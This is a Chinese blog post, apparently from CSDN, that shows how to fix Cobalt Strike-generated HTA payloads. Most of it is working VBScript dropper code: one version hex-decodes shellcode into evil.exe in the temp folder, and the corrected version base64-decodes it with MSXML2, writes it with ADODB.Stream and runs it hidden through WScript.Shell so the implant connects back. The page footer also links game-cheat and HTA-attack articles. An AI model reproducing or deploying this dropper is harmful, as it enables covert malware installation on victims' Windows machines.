	Set var_tempdir = var_obj.GetSpecialFolder(2)
	var_basedir = var_tempdir & "\test"
	var_obj.CreateFolder(var_basedir)
	var_tempexe = var_basedir & "\" & "evil.exe"
	Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
	For i = 1 to Len(var_shellcode) Step 2
	    var_stream.Write Chr(Clng("&H" & Mid(var_shellcode,i,2)))
	Next
	var_stream.Close
</script>
</head>
</html>

cs hta文件存在的问题:
这种方式生成的 evil.hta 执行后会生成一个 evil.exe 程序,然后执行,但是这种方式执行会报错。
问题原因在于 Chr(Clng(“&H” & Mid(var_shellcode,i,2)))
通过 Clng 函数把十六进制值,转换为十进制后,使用 Chr 函数转为 ASCII 值后写入文件中,会出现
十六进制值,无法转换为对应 ASCII 码的值,当出现这种情况时,会用 ? 表示无法转换的值,然后写
入文件中,而 ? 实际的十六进制值为 3F ,从而导致生成的程序出错。


<!DOCTYPE html>
<html>
<head>
<script type="text/vbscript">
 Dim mychar
 mychar = Clng(&H90)
 document.write(mychar)
</script>
</head>
</html>

三.解决方法

将cs生成的 var_shellcode 通过转换十进制,然后进行base64编码,替代下面代码的 var_b64shellcode 即可


<script language="VBScript">
 Function var_b64decode(var_b64string)
	 var_xmlns = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoftcom:datatypes" & Chr(34) & " " & _
	"dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
	 var_b64string & "</B64DECODE>"
	 Set var_msxml2 = CreateObject("MSXML2.DOMDocument.3.0")
	 var_msxml2.LoadXML(var_xmlns)
	 var_b64decode = var_msxml2.selectsinglenode("B64DECODE").nodeTypedValue
	set var_msxml2 = nothing
 End Function
 
 Function var_func()
	 var_b64shellcode = "TVqQAAMAAAAEAAAA//8AALgAAAAAAA.....AAAAAAAAAA="
	 Dim var_obj
	 Set var_obj = CreateObject("Scripting.FileSystemObject")
	 Dim var_stream
	 Dim var_tempdir
	 Dim var_tempexe
	 Dim var_basedir
	 Set var_tempdir = var_obj.GetSpecialFolder(2)
	 var_basedir = var_tempdir & "\" & var_obj.GetTempName()
	 var_obj.CreateFolder(var_basedir)
	 var_tempexe = var_basedir & "\" & "evil.exe"
	 Dim var_shell
	 Set var_shell = CreateObject("Wscript.Shell")
	 var_shellcode = var_b64decode(var_b64shellcode)
	 Set var_stream = CreateObject("ADODB.Stream")
	 var_stream.Type = 1
	 var_stream.Open
	 var_stream.Write var_shellcode
	 var_stream.SaveToFile var_tempexe, 2
	 var_shell.run var_tempexe, 0, true
	 var_obj.DeleteFile(var_tempexe)
	 var_obj.DeleteFolder(var_basedir)
 End Function
 var_func
 self.close
 
</script>

这里推荐一个编码地址:


https://gchq.github.io/CyberChef/

在这里插入图片描述

在这里插入图片描述

即可成功解决并上线;

安全菜鸟~
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
cs透视源码c语言,[原始] CS1.6透视插件(非D3D Hook)的简单分析(包括透视源代码)...
weixin_35346265的博客
05-23 6767
Cs1.6透视图插件,进行反向操作,编写OpenGL32透视图cs1.6人物透视指令,并与所有人共享今天的成功. .实际上,它也非常简单,代码很少,所需的工具为cs1.6,ollydebug,vs2010,gl32.h和OpenGL32.lib,这两个文件都具有vc ++ 6.0,将它们添加亲自到项目.好的,我正在对此进行研究. 我不在乎了无论如何,请使用杀毒软件将其杀死. 毕竟,这些插件几乎都...
C语言编译过程
qq_30001669的博客
07-11 255
C 程序编译步骤 C 代码编译成可执行程序经过4步: 预处理 宏定义展开、头文件展开、条件编译等,同时将代码中的注释删除,这里并不会检查语法 编译 检查语法,将预处理后文件编译生成汇编文件 汇编 将汇编文件生成目标文件(二进制文件) 链接 C语言写的程序是需要依赖各种库的,所以编译之后还需要把库链接到最终的可执行程序中去 gcc 编译过程 hello.c #include <stdio.h> int main() { printf("Hello, World!\n"); re
CS之攻击菜单详解-后门生成与上线
good good study
02-28 5249
能够生成HTA文档、office宏、payload生成器、exe程序。 windows可执行程序exe 可以看到能生成两种windows可执行程序,其分别代表stage分阶段和unstage(stageless)不分阶段。传送门 ——>Cobalt Strike中payload的stage与unstage区别 选择监听器后,按需生成不同类型的exe 然后在目标机器运行即可上线 payload生成器 选择生成如下类型的后门 ——>https://che...
mono linux 运行机制,linux – Mono如何神奇?
weixin_36105296的博客
05-09 410
我正在学习C#,所以我制作了一个名为Hello,World!的C#程序,然后用mono-csc编译并用mono运行它:$mono-csc Hello.cs$mono Hello.exeHello, World!我注意到当我用bash命中TAB时,Hello.exe被标记为可执行文件.实际上,它仅通过加载文件名的shell运行!Hello.exe不是带有趣文件扩展名的ELF文件:$readelf -...
HTA(html应用程序)攻击
Zlirving_的博客
02-23 3842
HTA 介绍 HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件界面没什么差别 大多数的Windows操作系统都支持Hta文件执行,可双击运行hta应用或命令行窗口mshta.exe解析执行文件,这里的.hta文件可以是本地的也可以是可访问的远程主机上的 HTA虽然用HTML、JS和CSS编写,却比普通网页权限大得多。它具有桌面程序的所有权限(读写文件、操作注册表等) HTA
hta文件制作教程.7z
08-02
在"hta文件制作教程.7z"这个压缩包中,包含了一个名为"1.hta"的文件,这很可能是教程的初始示例或练习项目。要理解并创建自己的HTA应用,你需要掌握以下几个关键知识点: 1. **HTA的基本结构**:一个HTA文件通常...
另一种可执行文件--hta文件.zip
11-21
将html制作成exe
HTA文件去除html控件认证和接收命令行参数
09-05
由于 HTA 不受网络安全策略的影响,它可以访问本地文件系统和执行某些权限较高的操作。在本话题中,我们将深入探讨如何使用 HTA 来去除 HTML 控件的认证以及如何接收命令行参数。 首先,让我们来看一下如何通过 HTA...
用于提取网易文件hta代码
09-06
下面的hta主要用于实现网易文件的提取,提供这个代码希望大家学习他的hta编写
汉字转拼音工具(hta源码
02-18
本文将深入探讨一款基于hta源码的汉字转拼音工具,解析其工作原理,并提供相关的应用实例。 一、hta源码hta技术 HTA(HTML Applications)是微软开发的一种技术,它允许开发者创建基于HTML、CSS和JavaScript的...
CS游戏代码
09-01
简单的CS代码,想学习的可以看看,有基本的功能
cs
03-10
北风
Unity类似CS射击游戏源码(可实现多人联机)
06-20
1、这是一个Unity的游戏源码,类似于CS游戏,里面有很多的武器。 2、这个游戏可以通过局域网联机对战。 3、这个是网盘的下载地址。
cs5640源码及电路图
12-07
基于电能计量芯片CS5460的电能计量系统,包括源码及电路图,测试通过。
cs的AK47源码
04-18
AK的高光效渲染版 高级源码 华丽董卓 细分贴图
CS架构快速源代码C#权限管理源码 C#源代码,二次开发
m0_66830820的博客
02-04 1433
CS架构快速源代码C#权限管理源码 C#源代码,二次开发 编号:8712641496190999正府街忠心的青蒿
内网渗透(二)之提权
最新发布
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-14 5555
对于内网渗透,到我们拿到了公网主机的权限后,并获得了一些本机的信息时。我们首先得知道我们的权限。如果获取到的是普通用户权限,则我们需要想办法提权至管理员权限。如果获得的已经是管理员权限,则可以忽略这一步。对于Windows系统,只有提权到管理员权限后,才可以运行mimikatz以及执行一些其他高权限的操作。对于Linux系统,很多命令需要root权限才能执行,只有提权到root权限才能执行后面的信息收集等工作。
HTA
03-21
标签中的“源码”可能指博客中分享的HTA应用示例代码,这可以帮助初学者理解和学习HTA的开发。而“工具”可能是指通过HTA创建的实用工具或开发辅助工具。 在压缩包子文件文件名称列表中,“新建文本文档 (6).hta...
HTA数据库操作
12-29
**HTA(HTML应用程序)数据库操作** HTA(HTML Applications)是Microsoft开发...在提供的压缩包中,`HTA数据库操作.hta`可能是一个示例HTA文件,而`TAB.mdb`则是一个Access数据库文件,你可以通过它们进行实践学习。
TC58NVG1S3HTA00.pdf
05-06
该器件具有高速度、高密度和非易失性数据存储的特点,适用于固态文件存储、语音记录、静态相机图像文件存储等应用。" 这篇文档详细介绍了TC58NVG1S3HTA00的主要特性和功能。首先,它是一个3.3V供电的NAND闪存芯片,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值